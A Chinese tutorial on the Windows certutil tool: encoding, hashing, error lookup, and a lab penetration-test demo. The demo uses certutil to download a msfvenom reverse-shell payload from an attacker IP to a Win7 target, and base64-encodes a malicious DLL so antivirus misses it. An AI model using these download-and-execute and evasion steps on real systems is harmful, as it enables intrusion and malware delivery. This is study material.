Certutil工具(Windows命令行下载常用)
工具介绍
certutil是windows下一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,以下命令是在Win7及其以后的机器中使用。其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀
Certutil
Certutil是一个CLI程序,可用于转储和显示证书颁发机构(CA),配置信息,证书服务,CA组件的备份和还原以及验证证书,密钥对和证书链,它作为证书服务的一部分安装
作为系统工具的它为什么会成为一个攻击工具(后门)?看下面演示
功能介绍
编码
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。
不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。
这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell
命令:Add-Content test.txt “ni hao”
type .\test.txt
编码(base64)
命令:certutil -encode test.txt encode.txt
type .\encode.txt
编码(十六进制)
命令:certutil -encodehex test.txt encode2.txt
type .\encode2.txt
解码
解码(base64)
命令:type .\encode.txt
certutil -decode encode.txt decode.txt
Type .\decode.txt
解码(十六进制)
散列
获取数据并传递固定长度的输出字符串。使用哈希加密算法,例如MD5,SHA-1,SHA-256,可以验证两个文件是否相同。该校验和用于执行检查的散列值的数据完整性,这是一种文件签名。通过比较校验和,我们可以识别重复文件。
命令:certutil -hashfile生成指定哈希值
命令:certutil -hashfile test.txt md5(生成md5)
命令:certutil -hashfile test.txt sha1(生成sha1)
命令:certutil -hashfile test.txt sha256(生成sha256)
下载
certutil还可用于从互联网下载文件
这里从服务器下载xss.js
命令:certutil.exe -urlcache -split -f http://服务器ip:8000/xss.js
系统错误代码
Certutil可以帮助你找到系统错误代码的消息文本,查看系统错误代码的含义
命令:certutil -error 8200
命令:certutil -error 0x200
使用Certutil进行渗透测试
环境:攻击机(kali 192.168.211.129)
靶机(win7 192.168.211.128)
Certutil可在未经任何验证或评估的情况下主动从Internet下载文件
Certutil可用于将文件从一个系统复制到另一个系统,以在攻击过程中横向移动一些攻击工具或其他文件
这里用msf中的msfvenom生成一个反向链接负载
通过python传输
同时kali机器msf开启监听
在靶机上通过certutil下载该文件并运行
返回查看监听
成功反弹shell
成功使用certutil和恶意可执行文件来Getshell
提交恶意DLL编码
Certutil可对文件进行base64编码,攻击者可以使用经过混淆的文件来隐藏扫描攻击的证据,然后再解码这些文件,这就是certutil发挥作用的地方,可以解码数据并避免杀毒软件的察觉。Certutil还可以用于解码已隐藏在证书文件中的可移植可执行文件。
有效载荷可以被编码或加密,以避免被检测
还是生成有效负载,有效负载的格式在动态链接库文件.dll中设置,命名为dll.txt
开起监听
在靶机上下载该文件,并且谨慎进行,文件被下载为文本文件且被编译成另一个文本文件,此时下载的是两个文件
命令:certutil -urlcache -split -f http://192.168.211.129:8000/dll.txt | certutil -encode dll.txt edll.txt
然后进行解码并保存在exploit.dll(杀毒软件不会察觉),运行dll
查看监听
成功使用certutil和恶意编码的可执行文件Getshell
参考链接:https://zhuanlan.zhihu.com/p/107819644
Certutil工具(Windows命令行下载常用)相关推荐
- windows命令行启动常用工具
在windows命令行(ctrl + r) 中输入关键字启动若干工具,能提升windows使用效率.不少工具其实是 C:\Windows\System32 下的工具. 下面列出一些常用关键字 task ...
- Windows命令行下常用网络命令解释大全
命令行下常用网络命令解释大全 1.Arp 显示和修改"地址解析协议"(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表.该命令只有在安装了 TCP/IP 协议之后才可用. ...
- windows命令行下常用命令 dos操作指令
windows常用命令 打开"运行"对话框(Win+R),输入cmd,打开控制台命令窗口... 也可以通过cmd /c 命令 和 cmd /k 命令的方式来直接运行命令 注:/c表 ...
- Windows命令行打开常用设置/控制面板功能
运行命令 功能 备注 ncpa.cpl 网络连接 wf.msc Windows 防火墙高级设置 control powercfg.cpl,3 高级电源设置 inetcpl.cpl Internet属性 ...
- 秒杀迅雷的linux命令行下载文件以及常用工具:wget、Prozilla、MyGet、Linuxdown、Curl、Axel
本文介绍常用的几种命令行式的下载工具:wget.Prozilla.MyGet.Linuxdown.Curl.Axel 下面就为大家详细介绍一下这些工具 1. Wget Wget是一个十分常用命令行下载 ...
- curl 命令行下载工具使用方法小结
获取curl curl 命令行下载工具 curl的官方网站为: http://curl.haxx.se 官方下载页面为:http://curl.haxx.se/download.html ...
- windows命令行工具
windows命令行工具(转)[@more@] accwiz.exe > Accessibility Wizard for walking you through setting up your ...
- windows命令行工具(转)
windows命令行工具(转)[@more@]accwiz.exe > Accessibility Wizard for walking you through setting up your ...
- Linux | (WGET、Curl、Aria2、Axel)的最佳命令行下载加速工具【详解】
简介: 在远程服务器或者本地工作时,您可能经常需要从外部源获取内容.要获得这样的内容,特别是当您没有其他选项时,您将需要使用Linux命令行工具来完成这项工作. 在本篇文章当中,我们将介绍一些最常用的 ...
最新文章
- 民族、学历学位、所学专业、、专业技术职务 对应表
- JavaScript语言特性
- asp.net 开发注意的几点
- 热泵精馏_异丙醇丙酮氢气化学热泵技术验证示范平台建成并完成调试
- OJ1076: 三位数求解(C语言)
- python sdweather_爬虫框架抓取练习-JMU SD weatherspider,scrapy,jmusdWeatherSpider
- python画好看的图-Python竟能画这么漂亮的花,帅呆了(代码分享)
- python 报错 wxPyDeprecationWarning: Using deprecated class PySimpleApp.
- matlab 求obb,obb包围盒代码
- 1194: 总成绩排序(结构体专题)
- 高德地图Key的获取过程(详细)
- 一篇文章带你了解——巨量引擎平台广告审核规则
- opta planner_使用Excel Christmas Planner进行整理
- 计算机组成原理编码键盘实验报告,计算机组成原理实验报告–杨睿.doc
- 一、计算机核心组成及CPU核心组成
- 0.1 Typora 文档备份
- Bootstrap5 文字排版讲解
- pacemaker+drbd主从
- IntelliJ IDEA 2018.2.4 x64破解
- 小白重装系统教程_大神教你小白一键重装系统
热门文章
- MacOS Finder配合Go2Shell在当前目录打开Terminal
- bootstrap单击导航条下的li后,自动收回
- Hystrix搭建Dashboard发生Unable to connect to Command Metric Stream.
- 厦门理工计算机课设,厦门理工c++课程设计.doc
- 算法-寻找第K大的数的方法总结
- 史上最纯净精简版win7系统封装过程,整个体积2.3G
- 好佳居窗帘十大品牌-窗帘卧室的精巧搭配
- TAISAW钛硕|TST嘉硕科技晶体振荡器在军事、航空航天中以及车载有什么应用?
- 咸阳师范学院计算机科学与技术在哪个校区,2021年咸阳师范学院有几个校区,大一新生在哪个校区...
- 发光二极管之一——工作原理图解分析